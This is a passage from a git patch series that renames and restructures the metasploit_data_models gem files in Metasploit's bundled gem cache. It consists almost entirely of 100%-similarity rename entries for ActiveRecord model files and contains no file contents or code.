b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/user.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/user.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/user.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_form.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_form.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_form.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_page.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_page.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_page.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_site.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_site.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_site.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_vuln.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_vuln.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_vuln.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_request.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/wmap_request.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_request.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_target.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/wmap_target.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_target.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/workspace.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/workspace.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/workspace.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/base64_serializer.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/base64_serializer.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/base64_serializer.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/base64_serializer.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/serialized_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/serialized_prefs.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/serialized_prefs.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/serialized_prefs.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/validators/ip_format_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/ip_format_validator.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/validators/ip_format_validator.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/ip_format_validator.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/validators/password_is_strong_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/validators/password_is_strong_validator.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/version.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/metasploit_data_models.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/metasploit_data_models.gemspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/metasploit_data_models_live.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models_live.gemspec similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/metasploit_data_models_live.gemspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models_live.gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/spec/lib/base64_serializer_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/lib/base64_serializer_spec.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/spec/lib/base64_serializer_spec.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/lib/base64_serializer_spec.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/spec/spec_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/spec/spec_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb diff --git a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.0.2.43DEV.gemspec b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec similarity index 100% rename from lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.0.2.43DEV.gemspec rename to lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec From 558b8b0fcf09c407df9b615e7587372edde1cf3e Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Thu, 1 Nov 2012 08:43:06 -0500 Subject: [PATCH 49/64] File renames and restructuring for metasploit_data_models 0.3.0 --- .../{README.mdown => README.md} | 0 .../models/mdm}/api_key.rb | 0 .../models/mdm}/client.rb | 0 .../models/mdm}/cred.rb | 0 .../models/mdm}/cred_file.rb | 0 .../models/mdm}/event.rb | 0 .../models/mdm}/exploit_attempt.rb | 0 .../models/mdm}/exploited_host.rb | 0 .../models/mdm}/host.rb | 0 .../models/mdm}/host_detail.rb | 0 .../models/mdm}/host_tag.rb | 0 .../models/mdm}/imported_cred.rb | 0 .../models/mdm}/listener.rb | 0 .../models/mdm}/loot.rb | 0 .../models/mdm}/macro.rb | 0 .../models/mdm}/mod_ref.rb | 0 .../models/mdm}/module_action.rb | 0 .../models/mdm}/module_arch.rb | 0 .../models/mdm}/module_author.rb | 0 .../models/mdm}/module_detail.rb | 0 .../models/mdm}/module_mixin.rb | 0 .../models/mdm}/module_platform.rb | 0 .../models/mdm}/module_ref.rb | 0 .../models/mdm}/module_target.rb | 0 .../models/mdm}/nexpose_console.rb | 0 .../models/mdm}/note.rb | 0 .../models/mdm}/profile.rb | 0 .../models/mdm}/ref.rb | 0 .../models/mdm}/report.rb | 0 .../models/mdm}/report_template.rb | 0 .../models/mdm}/route.rb | 0 .../models/mdm}/service.rb | 0 .../models/mdm}/session.rb | 0 .../models/mdm}/session_event.rb | 0 .../models/mdm}/tag.rb | 0 .../models/mdm}/task.rb | 0 .../models/mdm}/user.rb | 0 .../models/mdm}/vuln.rb | 0 .../models/mdm}/vuln_attempt.rb | 0 .../models/mdm}/vuln_detail.rb | 0 .../models/mdm}/vuln_ref.rb | 0 .../models/mdm}/web_form.rb | 0 .../models/mdm}/web_page.rb | 0 .../models/mdm}/web_site.rb | 0 .../models/mdm}/web_vuln.rb | 0 .../models/mdm}/wmap_request.rb | 0 .../models/mdm}/wmap_target.rb | 0 .../models/mdm}/workspace.rb | 0 .../metasploit_data_models_live.gemspec | 25 ------------------- 49 files changed, 25 deletions(-) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{README.mdown => README.md} (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/api_key.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/client.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/cred_file.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/exploit_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/exploited_host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/host_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/host_tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/imported_cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/listener.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/loot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/macro.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/mod_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_action.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_arch.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_author.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_mixin.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_platform.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/nexpose_console.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/note.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/profile.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/report.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/report_template.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/route.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/service.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/session.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/session_event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/task.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/user.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/vuln.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/vuln_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/vuln_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/vuln_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/web_form.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/web_page.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/web_site.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/web_vuln.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/wmap_request.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/wmap_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/workspace.rb (100%) delete mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models_live.gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.mdown b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.mdown rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/api_key.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/api_key.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/client.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/client.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/cred.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/cred_file.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/cred_file.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/event.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/exploit_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/exploited_host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/exploited_host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host_tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host_tag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/imported_cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/imported_cred.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/listener.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/listener.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/loot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/loot.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/macro.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/macro.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/mod_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/mod_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_action.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_arch.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_author.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb diff 